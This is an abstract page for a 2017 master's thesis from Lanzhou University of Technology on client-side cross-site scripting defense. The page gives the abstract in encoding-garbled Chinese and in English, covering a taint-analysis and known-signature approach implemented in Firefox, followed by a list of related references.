發(fā)布時(shí)間：2018-10-22 20:49

【摘要】：隨著互聯(lián)網(wǎng)技術(shù)的發(fā)展,Web應(yīng)用也越來(lái)越廣泛,基于B/S架構(gòu)的各類(lèi)網(wǎng)站和各種應(yīng)用系統(tǒng)層出不窮。為了增強(qiáng)用戶(hù)體驗(yàn),主流網(wǎng)站充分利用了動(dòng)態(tài)腳本語(yǔ)言,如Java Script語(yǔ)言。這種技術(shù)為用戶(hù)帶來(lái)便利的同時(shí),大量的安全漏洞和威脅也隨之而來(lái)。在當(dāng)今的Web應(yīng)用領(lǐng)域中,跨站腳本攻擊是最嚴(yán)重、最常見(jiàn)的威脅之一。Web應(yīng)用的安全機(jī)制的缺陷是該攻擊存在的根源,沒(méi)有對(duì)用戶(hù)的輸入進(jìn)行足夠的檢查和過(guò)濾。雖然在服務(wù)器端可以通過(guò)修復(fù)Web應(yīng)用,從根本性上解決該問(wèn)題,但是由于安全補(bǔ)丁的更新速度較慢,以及系統(tǒng)運(yùn)維人員安全意識(shí)的薄弱等原因,當(dāng)遭受跨站攻擊時(shí),仍然不能及時(shí)修復(fù)Web應(yīng)用中的漏洞,使用這些應(yīng)用時(shí)會(huì)導(dǎo)致用戶(hù)的操作處在高風(fēng)險(xiǎn)下。因此在遭受跨站腳本攻擊時(shí),為了提高用戶(hù)的主動(dòng)防御能力,研究用戶(hù)客戶(hù)端的跨站腳本攻擊防御措施顯得尤為重要。本文分析和探討了目前常用的跨站腳本攻擊的檢測(cè)防御技術(shù)后,進(jìn)行了如下兩方面研究:(1)在深刻理解動(dòng)態(tài)污點(diǎn)追蹤,靜態(tài)污點(diǎn)分析的基礎(chǔ)上,提出一種以動(dòng)態(tài)污點(diǎn)追蹤為主,靜態(tài)污點(diǎn)分析為輔的跨站腳本攻擊檢測(cè)防御方法,該方法首先對(duì)當(dāng)前頁(yè)面中的敏感信息進(jìn)行標(biāo)記,通過(guò)對(duì)當(dāng)前頁(yè)面中敏感信息傳輸過(guò)程的監(jiān)測(cè),當(dāng)敏感信息有異常操作時(shí),會(huì)向用戶(hù)發(fā)出危險(xiǎn)警告,并由用戶(hù)來(lái)處理,實(shí)現(xiàn)對(duì)跨站腳本攻擊的有效攔截。(2)針對(duì)已知常見(jiàn)的跨站腳本攻擊特征可以直接檢測(cè)的問(wèn)題,引入跨站腳本攻擊特征檢測(cè)技術(shù),提出了跨站腳本已知特征庫(kù)。在對(duì)用戶(hù)輸入的信息進(jìn)行靜態(tài)污點(diǎn)分析之后,將分析結(jié)果中可疑污點(diǎn)源與跨站腳本已知的特征庫(kù)作對(duì)比,對(duì)于存在于已知特征庫(kù)中的污點(diǎn)信息直接進(jìn)行過(guò)濾。而且結(jié)合污點(diǎn)判斷的結(jié)果,可以不斷更新已知特征庫(kù)。該擴(kuò)展的跨站腳本防御檢測(cè)技術(shù)極大的提高了檢測(cè)速度。在具體實(shí)現(xiàn)方法中,本文以開(kāi)源的Mozilla Firefox作為實(shí)驗(yàn)平臺(tái)。通過(guò)對(duì)該瀏覽器Java Script引擎的分析,擴(kuò)展它各個(gè)階段的處理過(guò)程。經(jīng)實(shí)驗(yàn)驗(yàn)證,本文提出的檢測(cè)防御方法是可行的。
[Abstract]:With the development of Internet technology, the application of Web is becoming more and more extensive, and various websites and application systems based on B / S architecture emerge endlessly. To enhance the user experience, mainstream websites make full use of dynamic scripting languages such as Java Script. This technology brings convenience to the user, at the same time, a large number of security vulnerabilities and threats also follow. In today's Web application field, cross-site scripting attack is the most serious and one of the most common threats. The flaw of the security mechanism of Web application is the root of the attack, and the user's input is not checked and filtered sufficiently. Although the problem can be fundamentally solved on the server side by fixing the Web application, due to the slow update speed of the security patches and the weak security awareness of the system operators, when they are subjected to cross-site attacks, There is still no time to fix vulnerabilities in Web applications, which can cause users to operate at high risk. Therefore, in order to improve the active defense ability of users, it is very important to study the defense measures of cross-site script attacks on users' clients when they are attacked by cross-site scripts. After analyzing and discussing the commonly used detection and defense technology of cross-station script attack, this paper makes the following two aspects of research: (1) based on the deep understanding of dynamic stain tracing and static stain analysis, a new method based on dynamic stain tracing is proposed. The method of cross-station script attack detection and defense supplemented by static stain analysis is used to mark sensitive information in the current page. By monitoring the process of transmission of sensitive information in the current page, when the sensitive information has abnormal operation, It will issue a danger warning to the user and be handled by the user to effectively intercept the cross-site script attack. (2) aiming at the problem that the known common cross-station script attack characteristics can be directly detected, the cross-station script attack feature detection technology is introduced. The known feature library of cross-station script is presented. After the static stain analysis of the information input by the user, the source of the suspicious stain in the analysis result is compared with the known feature library of the cross-station script, and the stain information that exists in the known feature library is filtered directly. And combined with the results of the stain judgment, you can constantly update the known feature library. The extended cross-site script defense detection technology greatly improves the detection speed. In the concrete implementation method, this paper takes the open source Mozilla Firefox as the experimental platform. Through the analysis of the browser Java Script engine, the processing process of each stage of the browser is extended. Experimental results show that the proposed method is feasible.
【學(xué)位授予單位】：蘭州理工大學(xué)
【學(xué)位級(jí)別】：碩士
【學(xué)位授予年份】：2017
【分類(lèi)號(hào)】：TP393.08

【參考文獻(xiàn)】

相關(guān)期刊論文 前7條

1 李維峰;;基于平臺(tái)的XSS攻擊緩解技術(shù)[J];電腦編程技巧與維護(hù);2017年05期

2 石穎;孫瑩;;分布式拒絕服務(wù)攻擊防御技術(shù)綜述[J];計(jì)算機(jī)安全;2014年07期

3 周穎杰;焦程波;陳慧楠;馬力;胡光岷;;基于流量行為特征的DoS&DDoS攻擊檢測(cè)與異常流識(shí)別[J];計(jì)算機(jī)應(yīng)用;2013年10期

4 王夏莉;張玉清;;一種基于行為的XSS客戶(hù)端防范方法[J];中國(guó)科學(xué)院研究生院學(xué)報(bào);2011年05期

5 陳建青;張玉清;;Web跨站腳本漏洞檢測(cè)工具的設(shè)計(jì)與實(shí)現(xiàn)[J];計(jì)算機(jī)工程;2010年06期

6 張潔;武裝;陸倜;;一種改進(jìn)的ARP協(xié)議欺騙檢測(cè)方法[J];計(jì)算機(jī)科學(xué);2008年03期

7 孫知信;任志廣;楊熙;王成;;基于多層檢測(cè)的網(wǎng)絡(luò)安全防范系統(tǒng)[J];通信學(xué)報(bào);2007年07期

相關(guān)碩士學(xué)位論文 前2條

1 曹文;基于哈希樹(shù)匹配模型的跨站腳本攻擊檢測(cè)防御研究[D];江西師范大學(xué);2013年

2 吳曉恒;跨站腳本攻擊的防御技術(shù)研究[D];上海交通大學(xué);2011年

，

本文編號(hào)：2288270